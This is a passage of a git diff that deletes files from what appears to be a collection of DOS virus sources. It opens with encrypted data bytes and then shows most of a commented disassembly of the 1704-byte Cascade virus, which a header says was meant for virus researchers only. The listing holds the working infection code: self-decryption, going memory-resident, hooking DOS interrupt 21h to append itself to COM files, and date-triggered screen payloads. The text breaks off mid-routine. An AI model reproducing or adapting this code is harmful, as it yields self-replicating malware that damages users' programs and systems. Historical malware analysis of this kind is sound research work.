7Ch - db 32h, 
49h,0FEh, 12h, 73h,0B3h - db 0CDh,0CDh,0F7h, 9Dh, 07h,0FFh - db 80h,0DEh,0DCh, 87h,0E6h, 77h - db 8Bh,0F6h,0DCh -loc_14: - into ; Int 4 on overflow - db 9Bh,0EFh, 63h, 9Bh,0E0h,0ABh - db 0A0h, 9Bh,0E8h, 71h, 8Fh,0FEh - db 0BBh, 86h, 45h, 76h,0B5h,0C2h - db 4Eh, 0Bh, 8Bh, 4Ch, 07h,0E0h - db 45h,0C4h,0E4h,0F6h,0D0h, 7Bh - db 0C4h,0EFh,0EEh,0C4h, 69h,0F0h - db 0E5h,0E2h,0C4h, 4Dh,0EDh,0F2h - db 0D4h, 30h,0F0h,0F2h,0F2h, 43h - db 25h,0D2h, 48h, 43h, 05h,0EAh - db 47h, 80h,0CBh,0A1h, 46h,0A6h - db 7Dh, 2Fh, 3Fh,0CFh,0B5h,0D1h - db 1Dh,0E0h,0F1h,0B5h, 6Fh, 51h - db 20h,0F5h, 79h, 01h - db 4Fh - db 57h,0F4h, 33h, 3Dh, 66h,0C4h -loc_16: - dec bx - dec cx - mov dl,0C0h - lahf ; Load ah from flags - add ax,7EDCh - jns loc_14 ; Jump if not sign - db 0F3h, 7Fh, 61h,0C4h,0E3h, 11h - db 42h,0C8h, 6Eh,0ECh,0D8h,0EEh - db 0BFh, 7Ch, 33h,0D0h - db 7Bh,0E4h, 8Dh, 8Eh,0A4h, 44h - db 80h - db 86h, 82h,0D8h,0A8h, 02h,0FCh - db 0F3h -loc_19: - div byte ptr [bp+di+377Ch] ; al,ah rem = ax/data - lock jmp $-211h -sub_1 endp - - db 6Bh, 51h,0C8h,0E3h, 51h,0EEh - db 0F3h, 4Bh, 53h,0F0h, 0Eh, 01h - db 6Ah,0C8h, 4Fh,0C4h, 42h,0C4h - db 92h - db 9 - db 0E0h, 09h,0F4h,0DEh,0F6h,0F6h - db 0F2h,0DCh, 62h,0E0h,0F4h,0E2h - db 0F8h, 6Bh,0F4h,0FEh,0EDh,0E0h - db 0EDh, 4Ah,0D7h,0D3h, 3Fh,0D3h - db 11h,0BBh, 19h,0B9h, 87h, 07h - db 0CEh, 22h,0E7h,0FCh,0F2h, 46h - db 0DCh, 3Bh,0D3h, 73h, 17h, 2Ah - db 0E5h, 95h, 83h, 92h,0C8h, 63h - db 17h, 52h,0F5h, 87h,0ABh,0E8h - db 4Ah,0DAh,0FBh, 03h,0E3h,0ECh - db 4Fh,0D8h,0F9h,0C3h,0E0h - db 42h - db 0F4h,0CFh,0F7h, 4Eh,0DAh,0D7h - db 54h,0CCh,0E5h,0ECh,0F9h, 2Bh - db 0C3h,0FDh,0C0h, 6Eh,0FCh,0A5h - db 0F7h,0FEh, 19h,0F4h, 1Eh, 0Eh -loc_22: - jl loc_19 ; Jump if < - hlt ; Halt processor - mov dl,6Ah ; 'j' - dec word ptr ds:data_56e[si] - out 1Eh,ax ; port 1Eh ??I/O Non-standard - jc loc_22 ; Jump if carry Set - mov dl,0C0h - dec bp - mov sp,0C8E3h - inc bp - and bl,0C0h - sub sp,si - xchg ax,si - div di ; ax,dx rem=dx:ax/reg - db 0F2h, 4Ah,0D2h,0FBh, 0Fh,0E3h - db 
0E8h, 4Fh,0DCh,0F1h,0CFh,0E0h - db 7Eh,0F4h - db 0C3h,0F7h,0ECh, 4Ah,0F2h,0CBh - db 58h, 5Fh,0E0h,0E8h,0FDh, 2Fh - db 0CFh,0F1h, 49h, 24h, 09h, 1Fh - db 65h, 0Ch, 8Eh,0F2h, 49h, 76h - db 16h, 28h,0FDh, 2Ch, 39h, 0Fh - db 4Dh, 58h,0A3h,0D8h, 36h,0F4h - db 0D9h,0EFh, 6Eh, 28h, 29h,0DAh - db 1Dh, 96h, 1Fh,0D2h,0F2h, 87h - db 1Eh, 6Ah,0A2h,0A1h, 9Fh, 9Ch - db 94h, 95h, 93h,0C0h,0DCh,0ECh - db 47h,0D8h,0B5h,0F3h,0D8h, 7Ah - db 0ECh,0BBh,0EFh,0E0h,0E5h, 5Ah - db 0E6h,0DBh, 2Fh,0C3h, 9Ch,0B8h - db 79h, 2Ah, 4Eh,0F6h,0A5h, 3Fh - db 0AFh,0A0h, 0Bh, 94h,0C5h, 87h - db 0ACh, 0Bh, 80h,0CBh,0F3h, 46h - db 0C9h,0F8h,0EDh, 48h,0C0h,0EFh - db 5Bh,0E1h,0E6h, 2Bh,0C3h, 90h - db 0D9h,0D5h, 33h, 87h,0C5h, 4Eh - db 0F0h,0B0h,0FDh, 07h,0F1h, 10h - db 0Bh,0E7h,0ECh, 61h, 85h - db 0CFh,0DCh, 7Bh,0E0h,0BBh,0F3h - db 46h,0D0h, 23h,0C3h,0CCh, 67h - db 0D8h,0CCh,0E3h,0A3h,0B4h, 87h - db 0F1h, 1Fh, 31h,0F2h,0DCh, 8Dh - db 37h, 48h, 04h, 01h, 76h, 0Ch - db 2Bh, 88h, 37h,0BEh,0F3h,0CDh - db 0Fh, 84h,0F1h, 07h, 5Dh,0E2h - db 0CCh, 66h,0D8h,0CCh,0E3h, 07h - db 9Bh,0FCh,0DCh - db 57h -loc_27: - mov bp,0F7F3h - xchg ax,di - aaa ; Ascii adjust - in al,dx ; port 0FEC0h ??I/O Non-standard - stc ; Set carry flag - db 0C0h,0E9h - db 0C3h,0B6h, 29h, 76h,0F2h,0B1h - db 0D8h, 33h,0E4h,0B5h,0EFh, 23h - db 0C3h, 90h, 3Dh,0C8h, 6Bh,0ECh - db 0AFh,0EFh, 72h, 03h,0D6h, 00h - db 33h,0D5h,0FAh, 87h, 3Ah, 83h - db 0C5h,0B5h, 4Bh, 4Fh,0AFh - db 0FCh, 37h, 4Ah,0F4h - db 0CBh, 3Fh,0D3h, 9Ch, 50h, 69h - db 3Ah, 5Eh,0E4h,0A0h,0D1h, 27h - db 0DDh, 20h, 3Fh,0D7h, 1Eh,0A2h - db 0F1h,0BDh,0D6h, 7Ah,0C2h, 84h - db 0E8h, 49h,0CCh, 83h,0CFh,0DCh - db 79h,0E0h,0BDh,0F3h, 3Fh,0CFh - db 5Ah,0A2h,0D1h, 2Fh, 2Bh,0C3h - db 09h,0CFh, 7Eh - db 4Ah,0F2h,0B4h,0C5h, 3Bh,0C1h - db 0DCh,0C3h, 23h, 70h, 13h, 28h - db 0A3h, 49h, 0Fh, 0Bh, 0Ch, 0Dh - db 0D8h, 55h,0A2h,0F3h, 5Ah,0AEh - db 58h,0ADh,0E7h, 5Fh,0E1h,0E2h - db 23h,0CFh, 4Ah,0F3h,0A1h,0D8h - db 79h,0E4h, 8Dh,0CFh,0ECh, 49h - db 0C8h, 83h,0C3h, 0Fh,0EFh, 7Ah - db 0CCh, 3Fh,0D7h,0D8h, 
79h,0FCh - db 0AFh,0EFh, 14h, 23h,0E1h, 93h - db 0E7h, 14h, 2Fh,0CEh, 87h,0F8h - db 4Eh,0F7h,0B1h,0DCh, 4Bh, 98h - db 0C5h, 83h, 4Bh,0A7h, 9Dh, 85h - db 0D3h,0D1h,0ACh,0A8h,0AFh,0ADh - db 0AAh, 6Fh, 07h, 5Ch, 1Ch,0FCh - db 0E8h -loc_33: - stc ; Set carry flag - mov cl,0B3h - mov sp,4BBEh - cmc ; Complement carry - db 0F6h, 4Dh, 86h,0F3h, 31h,0F9h - db 49h, 85h, 38h,0D7h,0C5h, 89h - db 85h - db 2Ch, 05h,0AAh,0E7h,0F1h, 79h - db 0E5h,0B6h,0E5h, 22h, 96h,0E4h - db 11h, 00h, 69h, 2Ch,0B4h,0ABh - db 0A9h,0E9h, 35h,0ECh,0F4h, 58h - db 58h, 52h, 0Dh, 00h,0BEh, 43h - db 03h, 81h,0D6h, 4Ch, 94h,0F7h - db 48h, 9Eh,0F2h, 57h,0E6h,0E2h - db 1Eh, 15h, 43h,0BBh,0BDh,0B0h - db 0E9h,0EDh, 31h,0A0h,0E8h,0A0h - db 78h, 08h, 38h,0E4h, 90h,0C7h - db 70h,0C2h,0C1h - db 0Ch - db 1Fh, 12h,0F1h,0F0h,0ACh,0F3h - db 79h, 1Eh, 18h,0E4h,0B6h,0E7h - db 19h, 6Ch,0FCh,0B6h,0EFh, 86h - db 0E0h, 4Ch, 2Ch,0F1h, 08h, 62h - db 26h, 8Ah,0F7h, 8Fh, 2Eh, 83h - db 0F7h, 79h, 62h, 5Ah,0F3h, 82h - db 0Dh, 5Fh - db 09h,0B4h,0F1h,0BCh, 21h,0B1h - db 0E0h,0B0h,0B1h, 65h, 36h, 78h - db 34h, 00h,0D0h,0A0h,0F3h, 78h - db 0CEh,0C1h, 00h, 17h, 26h,0C1h - db 0C4h, 94h,0CFh, 79h, 0Ah, 00h - db 0F0h,0A6h,0F3h, 11h, 60h,0E4h - db 0BAh,0E7h, 92h,0F0h, 58h, 34h - db 0EDh, 08h, 1Eh, 5Eh,0FEh, 87h - db 0FBh,0A6h, 0Fh, 77h,0F5h,0EAh - db 0AEh, 03h, 76h,0F5h, 85h, 31h - db 58h, 0Dh,0ADh,0A8h,0F5h,0B1h - db 2Dh,0B3h,0B3h, 6Dh,0E8h,0BEh - db 0E3h, 0Ch, 10h,0ABh, 10h, 00h - db 0AFh, 31h,0A2h, 2Ah,0AFh,0F6h - db 0C0h,0E2h, 38h, 24h,0A3h, 96h - db 0Dh,0CEh,0F2h, 82h,0FCh,0CEh - db 0D2h, 9Ah,0E8h,0DEh, 1Dh, 92h - db 0E4h, 1Ah, 21h, 17h, 2Dh,0CEh - db 42h, 84h,0F0h,0CEh, 2Dh,0F9h - db 8Ch, 7Bh, 41h, 7Eh, 45h, 9Ch - db 3Ah,0CEh, 8Eh, 7Ch, 2Ah, 0Dh - db 57h, 9Eh,0F2h,0D5h,0E8h, 8Eh - db 0E2h, 92h, 1Ch,0D1h -loc_37: - sub cx,[bx-7Eh] - db 0F2h,0B3h, 82h,0E3h,0C9h,0F4h - db 0A2h,0CEh,0B6h, 35h,0D9h, 4Dh - db 03h,0F1h, 1Ch, 77h,0FDh,0F2h - db 01h, 07h,0DCh, 51h,0B2h,0EFh - db 21h,0ABh - db 0Dh, 08h - db 24h,0E4h - db 
0BDh,0EFh,0EAh,0ECh, 4Eh,0B6h - db 0F2h, 7Ch,0D6h,0ACh, 4Fh, 01h - db 1Ah,0A6h, 5Bh, 00h,0BFh,0F2h - db 49h,0C2h,0E7h, 41h,0F2h,0F4h - db 0BBh, 23h,0F2h,0BFh,0E1h, 66h - db 18h, 1Dh, 9Ah,0EAh, 7Ah,0E4h - db 0A5h,0F7h, 46h,0FDh, 03h,0DEh - db 4Ah,0E4h, 94h,0C7h, 04h,0C4h - db 9Ah,0CFh,0F2h, 35h,0F0h,0AEh - db 0F3h,0F2h, 5Eh,0D2h,0E5h, 96h - db 0D0h, 94h - db 0E1h, 0Bh, 0Eh,0EEh, 35h,0F4h - db 0AEh,0F7h,0F2h, 4Ah,0B2h, 8Dh - db 0F5h - -locloop_40: - movsw ; Mov [si] to es:[di] -;* mov dx,offset loc_46 ;* - db 0BAh, 84h,0F0h - mov ax,ds:data_45e - cmpsb ; Cmp [si] to es:[di] - db 0F3h,0F7h, 56h,0A1h,0F3h, 10h - db 2Eh, 14h,0C4h,0B4h,0E7h, 41h - db 80h,0EFh, 4Fh, 96h,0F3h,0CDh - db 0F0h, 90h,0F3h,0B8h,0CDh, 63h - db 0A0h,0C7h, 2Eh,0A9h, 3Ch, 8Eh - db 45h, 02h,0C1h, 09h,0B1h, 53h - db 90h,0EFh, 3Fh, 02h,0D9h, 1Eh - db 90h,0E1h, 0Bh, 4Eh,0EEh, 72h - db 0FCh,0A1h,0F7h,0F0h, 52h, 5Ch - db 0Fh,0B6h, 02h,0EEh, 4Ah,0FCh - db 88h,0DEh,0AEh,0A1h,0F3h, 42h - db 0F6h, 1Ah,0B0h, 10h, 64h, 12h - db 0Ah, 60h, 18h, 0Ah,0F3h, 11h - db 9Ch, 20h, 1Ah,0EAh, 09h, 80h - db 3Fh, 6Ch, 9Bh,0C3h, 4Ah,0E0h - db 90h,0C3h, 48h,0C0h, 9Dh,0F3h - db 47h,0F6h, 08h, 34h,0C8h,0D8h - db 0BDh,0E3h, 95h,0B4h, 0Eh, 86h - db 1Ch,0D4h,0C8h,0A4h,0F3h, 83h - db 0BFh, 1Ah, 1Bh, 70h,0FCh,0AAh - db 6Ah, 72h, 78h,0F0h,0BDh, 70h - db 48h,0C8h,0C4h,0A5h,0F7h, 85h - db 0C5h, 06h,0A7h, 1Ch,0D8h,0C0h - db 0B0h,0E3h, 97h,0C0h, 06h, 3Ch - db 0Ch, 85h, 13h, 1Ah, 4Ch, 30h - db 30h, 0Ch, 2Ah,0F0h, 38h, 60h - db 97h,0CFh, 30h, 34h, 72h,0D0h - db 0A1h,0F3h, 0Fh, 10h, 20h, 52h - db 0C2h, 0Eh,0BBh, 1Ch, 1Ch, 28h - db 4Eh,0A7h,0F3h, 1Eh,0A3h, 0Ch - db 11h, 0Ah,0E7h, 8Dh,0FDh, 4Eh - db 0ECh,0A5h,0F5h, 09h, 58h,0F2h - db 0F0h, 82h,0F5h, 1Bh,0AEh, 11h - db 06h, 69h, 1Ch,0A8h, 92h,0E1h - db 0Bh,0BFh, 11h, 16h, 93h,0D2h - db 0Ah, 14h, 93h, 0Dh,0E0h, 34h - db 0C4h, 91h,0C7h,0CBh,0B7h, 96h - db 0E0h, 72h,0FCh,0A1h,0F7h,0F3h - db 0DCh, 11h,0E0h,0BCh,0E3h, 93h - db 0A3h,0FCh - -locloop_41: - in al,0E0h ; port 0E0h, Memory encode reg2 - 
db 0F1h,0FCh,0F5h,0A6h,0A5h,0A3h - db 0A0h,0D8h,0D9h,0D7h, 32h,0A6h - db 60h,0A2h, 23h,0EEh, 8Fh,0CFh - db 0CAh,0F2h, 85h,0F1h, 4Ah,0D6h - db 0EAh, 0Ah, 9Ch, 1Bh,0A6h, 41h - db 0BCh,0EFh, 4Dh, 92h,0F3h, 1Eh - db 61h, 0Ch, 4Ah,0CDh,0CEh, 2Ah - db 0ACh, 3Bh, 86h, 35h,0E4h,0AAh - db 0CFh, 81h,0F1h, 4Eh, 09h, 0Dh - db 51h, 8Ah,0EFh,0BFh,0BDh,0B8h - db 0BCh,0BBh,0B9h,0B6h,0E9h,0EDh - db 0DCh, 76h,0D0h,0A5h,0F3h,0F0h - db 20h,0FDh, 2Ch, 35h, 07h, 2Ch - db 0F4h, 08h, 59h,0F3h,0FAh, 82h - db 0EBh,0A2h,0A3h,0BCh, 5Ah,0C8h - db 2Fh,0C7h, 67h, 1Bh, 26h,0E9h - db 9Ch,0FFh, 85h,0F3h - -locloop_42: - jbe loc_45 ; Jump if below or = - clc ; Clear carry flag - mov sp,0ECC8h - inc dx - loopnz locloop_41 ; Loop if zf=0, cx>0 - - retn - db 35h, 94h - db 97h - db 0AAh -loc_45: - esc 4,[bx+di] ; coprocessor escape - esc 0,cl ; coprocessor escape - db 0F3h,0E8h,0BDh, 56h,0AAh, 5Dh - db 8Dh,0E2h, 2Fh,0CFh,0B5h, 81h - db 0F1h, 0Fh,0F1h, 31h,0DCh, 48h - db 88h, 82h, 83h, 87h, 08h, 42h - db 8Ch, 91h,0BDh, 0Dh, 4Ch,0F6h - db 0F7h, 4Bh, 57h,0E8h, 12h, 11h - db 46h, 59h,0C5h,0E2h, 5Ch,0CDh - db 0EFh,0F1h,0C4h,0BDh,0F7h, 4Bh - db 70h,0C8h,0E8h,0F3h,0F7h,0E0h - db 0F7h,0CFh, 85h, 88h, 2Ch, 04h - db 7Ch, 2Eh, 42h,0B2h,0C1h, 3Ch - db 57h, 47h,0E4h, 2Bh,0C7h, 7Eh - db 0B2h, 5Ah,0A7h, 3Fh,0D3h,0AEh - db 6Bh,0FCh,0EDh, 7Ch,0BBh, 36h - db 0CCh, 7Ch,0BFh, 0Ah,0F5h,0C2h - -seg_a ends - - - - end start diff --git a/0-9/1704 (5).ASM b/0-9/1704 (5).ASM deleted file mode 100755 index 0f93af6..0000000 --- a/0-9/1704 (5).ASM +++ /dev/null 
@@ -1,919 +0,0 @@ - page 65,132 - title The 'Cascade' Virus (1704 version) -; ͻ -; British Computer Virus Research Centre -; 12 Guildford Street, Brighton, East Sussex, BN1 3LS, England -; Telephone: Domestic 0273-26105, International +44-273-26105 -; -; The 'Cascade' Virus (1704 version) -; Disassembled by Joe Hirst, March 1989 -; -; Copyright (c) Joe Hirst 1989. -; -; This listing is only to be made available to virus researchers -; or software writers on a need-to-know basis. -; ͼ - - ; The virus occurs attached to the end of a COM file. The first - ; three bytes of the program are stored in the virus, and replaced - ; by a branch to the beginning of the virus. - - ; The disassembly has been tested by re-assembly using MASM 5.0. - -RAM SEGMENT AT 400H - - ; System data - - ORG 4EH -BW044E DW ? ; VDU display start address - - ORG 6CH -BW046C DW ? ; System clock - -RAM ENDS - -MCB SEGMENT AT 0 ; Memory control block references - -MB0000 DB ? ; MCB signature -MW0001 DW ? ; MCB owner -MW0003 DW ? ; MCB size - -MCB ENDS - -OPROG SEGMENT AT 0 ; Original program references - - ORG 100H -OW0100 DW ? -OB0102 DB ? - -OPROG ENDS - -CODE SEGMENT BYTE PUBLIC 'CODE' - ASSUME CS:CODE,DS:OPROG - -VIRLEN EQU OFFSET ENDADR-START -MAXLEN EQU OFFSET START-ENDADR-20H -JMPADR = OFFSET START-ENDADR-2 - - ORG 16H -DW0016 DW ? ; PSP parent ID - - ORG 2CH -DW002C DW ? ; PSP environment - - ORG 36H -DW0036 DW ? 
; FHT segment - - ORG 100H - -START: - -DB0100 DB 1 ; Encryption indicator - - ; Virus entry point - -ENTRY: CLI - MOV BP,SP ; Save stack pointer - CALL BP0010 ; \ Get address of BP0010 -BP0010: POP BX ; / - SUB BX,OFFSET BP0010+2AH ; Standardise relocation reg - TEST DB0100[BX+2AH],1 ; Is virus encrypted - JZ BP0030 ; Branch if not - LEA SI,BP0030[BX+2AH] ; Address start of encrypted area - MOV SP,OFFSET ENDADR-BP0030 ; Length of encrypted area -BP0020: XOR [SI],SI ; \ Decrypt - XOR [SI],SP ; / - INC SI ; \ Next address - DEC SP ; / - JNZ BP0020 ; Repeat for all area -BP0030: MOV SP,BP ; Restore stack pointer - JMP BP0040 ; Branch past data - - ; Data - -PROGRM EQU THIS DWORD -PRG_OF DW 100H ; Original program offset -PRG_SGIDW 1021H ; Original program segment - -INITAX DW 0 ; Initial AX value -PROG_1 DW 2DE9H ; \ First three bytes of program -PROG_2 DB 0DH ; / - DB 0, 0 - -I1CBIO EQU THIS DWORD -I1C_OF DW 0FF53H ; Interrupt 1CH offset -I1C_SG DW 0F000H ; Interrupt 1CH segment - -I21BIO EQU THIS DWORD -I21_OF DW 1460H ; Interrupt 21H offset -I21_SG DW 026AH ; Interrupt 21H segment - -I28BIO EQU THIS DWORD -I28_OF DW 1445H ; Interrupt 28H offset -I28_SG DW 0270H ; Interrupt 28H segment - - DW 0 ; - not referenced -F_ATTR DW 0 ; File attributes -F_DATE DW 0E71H ; File date -F_TIME DW 601FH ; File time -F_PATH EQU THIS DWORD -PATHOF DW 044EH ; File pathname offset -PATHSG DW 20FFH ; File pathname segment -F_SIZ1 DW 62DBH ; File size - low word -F_SIZ2 DW 0 ; File size - high word -JUMP_1 DB 0E9H ; \ Jump instruction -JUMP_2 DW 1D64H ; / -NUMCOL DB 0 ; Number of display columns -NUMROW DB 0 ; Number of display rows -C80_SW DB 0 ; 80 column text switch -CURCHA DB 0 ; Current character -CURATT DB 0 ; Current attributes -SWITCH DB 8 ; Switches - ; 01 Int 1CH active - ; 02 Switch 2 - ; 04 Switch 3 - not used - ; 08 No display -RAM_SG DW 0 ; Video RAM segment -VDURAM DW 0 ; VDU display start address -LOOPCT DW 04F8H ; Timed loop count -I1CCNT DW 0FDAH ; Int 1CH count 
-I1CMAX DW 0FDAH ; Int 1CH random number maximum -NUMPOS DW 0 ; Number of display positions -RANPOS DW 1 ; Number of lines to affect -RANDOM DW 8FB2H, 0AH, 0, 0, 100H, 0, 1414H, 14H - - ; Main program start - -BP0040: CALL BP0050 ; \ Get address of BP0050 -BP0050: POP BX ; / - SUB BX,OFFSET BP0050+2AH ; Standardise relocation reg - MOV PRG_SG[BX+2AH],CS ; Save original program segment - MOV INITAX[BX+2AH],AX ; Save initial AX value - MOV AX,PROG_1[BX+2AH] ; Get first 2 bytes of program - MOV OW0100,AX ; Replace them - MOV AL,PROG_2[BX+2AH] ; Get third byte of program - MOV OB0102,AL ; Replace it - PUSH BX - MOV AH,30H ; Get DOS version number function - INT 21H ; DOS service - POP BX - CMP AL,2 ; Version 2.X or above? - JB BP0060 ; Branch if not - MOV AX,4BFFH ; Is virus active function - XOR DI,DI ; Clear register - XOR SI,SI ; Clear register - INT 21H ; DOS service - CMP DI,55AAH ; Is virus already active - JNE BP0070 ; Branch if not -BP0060: STI - PUSH DS ; \ Set ES to DS - POP ES ; / - MOV AX,INITAX[BX+2AH] ; Restore initial AX value - JMP PROGRM[BX+2AH] ; Branch to original program - -BP0070: PUSH BX - MOV AX,3521H ; Get interrupt 21H function - INT 21H ; DOS service - MOV AX,BX ; Move interrupt 21H offset - POP BX - MOV I21_OF[BX+2AH],AX ; Save interrupt 21H offset - MOV I21_SG[BX+2AH],ES ; Save interrupt 21H segment - MOV AX,0F000H ; \ - MOV ES,AX ; ) Address BIOS - MOV DI,0E008H ; / - CMP WORD PTR ES:[DI],'OC' ; \ Branch if not IBM BIOS - JNE BP0080 ; / - CMP WORD PTR ES:[DI+2],'RP' ; \ Branch if not IBM BIOS - JNE BP0080 ; / - CMP WORD PTR ES:[DI+4],' .' 
; \ Branch if not IBM BIOS - JNE BP0080 ; / - CMP WORD PTR ES:[DI+6],'BI' ; \ Branch if not IBM BIOS - JNE BP0080 ; / - CMP WORD PTR ES:[DI+8],'M' ; \ IBM BIOS - JE BP0060 ; / - - ; Install virus - - ASSUME ES:MCB,DS:NOTHING -BP0080: MOV AX,007BH ; Load size of virus in paragraphs - MOV BP,CS ; Get current segment - DEC BP ; \ Address back to MCB - MOV ES,BP ; / - MOV SI,DW0016 ; Get parent ID - MOV MW0001,SI ; Store as owner in MCB - MOV DX,MW0003 ; Get MCB size - MOV MW0003,AX ; Store virus size - MOV MB0000,4DH ; Store MCB identification - SUB DX,AX ; Subtract virus from original size - DEC DX ; - INC BP ; Forward from MCB - ADD BP,AX ; Add size of virus - INC BP ; And of another MCB - MOV ES,BP ; Address new PSP segment - PUSH BX - MOV AH,50H ; Set current PSP function - MOV BX,BP ; New PSP segment - INT 21H ; DOS service - POP BX - XOR DI,DI ; Clear register - PUSH ES ; \ Set stack segment to new PSP - POP SS ; / - PUSH DI - LEA DI,CPY040[BX+2AH] ; Address end of virus - MOV SI,DI ; And for source - MOV CX,VIRLEN ; Get length of virus - STD ; Going downwards - REPZ MOVSB ; Copy virus - PUSH ES ; Push new segment - LEA CX,BP0090[BX+2AH] ; \ And next instruction - PUSH CX ; / - RETF ; ... 
and load them - - ; Now running in virus at end of new program segment - -BP0090: MOV PRG_SG[BX+2AH],CS ; New segment in program address - LEA CX,DB0100[BX+2AH] ; Get length of original program - REPZ MOVSB ; Copy original program to new PSP - MOV DW0036,CS ; New segment in handle table address - DEC BP ; \ Address back to MCB - MOV ES,BP ; / - MOV MW0003,DX ; Store original program size - MOV MB0000,5AH ; Store MCB ident (last) - MOV MW0001,CS ; Store CS as owner in MCB - INC BP ; \ Forward again to PSP - MOV ES,BP ; / - PUSH DS ; \ Set ES to DS - POP ES ; / - PUSH CS ; \ Set DS to CS - POP DS ; / - LEA SI,DB0100[BX+2AH] ; Address start of virus - MOV DI,OFFSET DB0100 ; Start of program area in first area - MOV CX,VIRLEN ; Get length of virus - CLD ; Copy forwards - REPZ MOVSB ; Copy virus to start of first area - PUSH ES ; Push segment of first area - LEA AX,BP0100 ; \ Offset of next instruction - PUSH AX ; / - RETF ; ... and load them - - ; Now running in installed virus, first area - - ASSUME ES:NOTHING -BP0100: MOV DW002C,0 ; No environment pointer - MOV DW0016,CS ; Is its own parent - PUSH DS - LEA DX,INT_21 ; Interrupt 21H routine - PUSH CS ; \ Set DS to CS - POP DS ; / - MOV AX,2521H ; Set interrupt 21H function - INT 21H ; DOS service - POP DS - MOV AH,1AH ; Set DTA function - MOV DX,0080H ; DTA address - INT 21H ; DOS service - CALL GETCLK ; Copy system clock - MOV AH,2AH ; Get date function - INT 21H ; DOS service - CMP CX,07C4H ; Year 1988? - JA BP0130 ; Branch if after 1988 - JE BP0110 ; Branch if 1988 - CMP CX,07BCH ; Year 1980? 
- JNE BP0130 ; Branch if not - PUSH DS - MOV AX,3528H ; Get interrupt 28H function - INT 21H ; DOS service - MOV I28_OF,BX ; Save interrupt 28H offset - MOV I28_SG,ES ; Save interrupt 28H segment - MOV AX,2528H ; Set interrupt 28H function - MOV DX,OFFSET INT_28 ; Int 28H routine address - PUSH CS ; \ Set DS to CS - POP DS ; / - INT 21H ; DOS service - POP DS - OR SWITCH,8 ; Set on No display switch - JMP BP0120 - - ; Year is 1988 - -BP0110: CMP DH,0AH ; October? - JB BP0130 ; Branch if not -BP0120: CALL TIMCYC ; Time one clock cycle - MOV AX,1518H ; Upper limit - 5400 - CALL RNDNUM ; Create random number - INC AX ; Add to random number - MOV I1CCNT,AX ; Set Int 1CH count - MOV I1CMAX,AX ; Set Int 1CH random no maximum - MOV RANPOS,1 ; Set num of lines to affect to 1 - MOV AX,351CH ; Get interrupt 1CH function - INT 21H ; DOS service - MOV I1C_OF,BX ; Save interrupt 1CH offset - MOV I1C_SG,ES ; Save interrupt 1CH segment - PUSH DS - MOV AX,251CH ; Set interrupt 1CH function - MOV DX,OFFSET INT_1C ; Int 1CH routine address - PUSH CS ; \ Set DS to CS - POP DS ; / - INT 21H ; DOS service - POP DS -BP0130: MOV BX,-2AH ; Set up relocation register - JMP BP0060 ; Branch to start program - - ; Interrupt 21H routine - -INT_21: CMP AH,4BH ; Load function? - JE I_2106 ; Branch if yes -I_2102: JMP I21BIO ; Branch to original int 21H - - ; Virus call - -I_2104: MOV DI,55AAH ; Virus call - signal back - LES AX,I21BIO ; Load return address - MOV DX,CS ; Load segment - IRET - - ; Load and execute function - -I_2106: CMP AL,0FFH ; Is this a virus call? - JE I_2104 ; Branch if yes - CMP AL,0 ; Load and execute? 
- JNE I_2102 ; Branch if not - PUSHF - PUSH AX - PUSH BX - PUSH CX - PUSH DX - PUSH SI - PUSH DI - PUSH BP - PUSH ES - PUSH DS - MOV PATHOF,DX ; Save pathname offset - MOV PATHSG,DS ; Save pathname segment - PUSH CS ; \ Set ES to CS - POP ES ; / - MOV AX,3D00H ; Open handle function - INT 21H ; DOS service - JB I_2110 ; Branch if error - MOV BX,AX ; Move file handle - MOV AX,5700H ; Get file date and time function - INT 21H ; DOS service - MOV F_DATE,DX ; Save file date - MOV F_TIME,CX ; Save file time - MOV AH,3FH ; Read handle function - PUSH CS ; \ Set DS to CS - POP DS ; / - MOV DX,OFFSET PROG_1 ; \ First three bytes of program - MOV CX,3 ; / - INT 21H ; DOS service - JB I_2110 ; Branch if error - CMP AX,CX ; Correct length read? - JNE I_2110 ; Branch if error - MOV AX,4202H ; Move file pointer (EOF) function - XOR CX,CX ; \ No displacement - XOR DX,DX ; / - INT 21H ; DOS service - MOV F_SIZ1,AX ; File size - low word - MOV F_SIZ2,DX ; File size - high word - MOV AH,3EH ; Close handle function - INT 21H ; DOS service - CMP PROG_1,5A4DH ; Is it an EXE file? - JNE I_2108 ; Branch if not - JMP I_2124 ; Dont infect - -I_2108: CMP F_SIZ2,0 ; File size - high word - JA I_2110 ; Branch if file too big - CMP F_SIZ1,MAXLEN ; Maximum file size? 
- JBE I_2112 ; Branch if file not too big -I_2110: JMP I_2124 ; Dont infect - -I_2112: CMP BYTE PTR PROG_1,0E9H ; Does program start with a branch - JNE I_2114 ; Branch if not - MOV AX,F_SIZ1 ; Get file size - low word - ADD AX,WORD PTR JMPADR ; Convert to infected offset - CMP AX,PROG_1+1 ; Is it the same - JE I_2110 ; Branch if already infected -I_2114: MOV AX,4300H ; Get file attributes function - LDS DX,F_PATH ; Pathname pointer - INT 21H ; DOS service - JB I_2110 ; Branch if error - MOV F_ATTR,CX ; Save file attributes - XOR CL,20H ; Change archive bit - TEST CL,27H ; Are there any attributes to change - JZ I_2116 ; Branch if not - MOV AX,4301H ; Set file attributes function - XOR CX,CX ; No attributes - INT 21H ; DOS service - JB I_2110 ; Branch if error -I_2116: MOV AX,3D02H ; Open handle (R/W) function - INT 21H ; DOS service - JB I_2110 ; Branch if error - MOV BX,AX ; Move file handle - MOV AX,4202H ; Move file pointer (EOF) function - XOR CX,CX ; \ No displacement - XOR DX,DX ; / - INT 21H ; DOS service - CALL CPYVIR ; Copy virus to program - JNB I_2118 ; Branch if no error - MOV AX,4200H ; Move file pointer (Start) function - MOV CX,F_SIZ2 ; File size - high word - MOV DX,F_SIZ1 ; File size - low word - INT 21H ; DOS service - MOV AH,40H ; Write handle function - XOR CX,CX ; Zero length (reset length} - INT 21H ; DOS service - JMP I_2120 ; Reset file details - -I_2118: MOV AX,4200H ; Move file pointer (Start) function - XOR CX,CX ; \ No displacement - XOR DX,DX ; / - INT 21H ; DOS service - JB I_2120 ; Branch if error - MOV AX,F_SIZ1 ; Get file size - low word - ADD AX,0FFFEH ; Convert to jump offset - MOV JUMP_2,AX ; Store in jump instruction - MOV AH,40H ; Write handle function - MOV DX,OFFSET JUMP_1 ; Address to jump instruction - MOV CX,3 ; Length of jump instruction - INT 21H ; DOS service -I_2120: MOV AX,5701H ; Set file date and time function - MOV DX,F_DATE ; Get old file date - MOV CX,F_TIME ; Get old file time - INT 21H ; DOS service - MOV 
